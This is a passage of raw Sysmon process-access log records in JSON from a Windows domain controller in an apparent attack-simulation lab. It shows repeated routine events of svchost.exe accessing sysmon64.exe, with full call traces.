06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 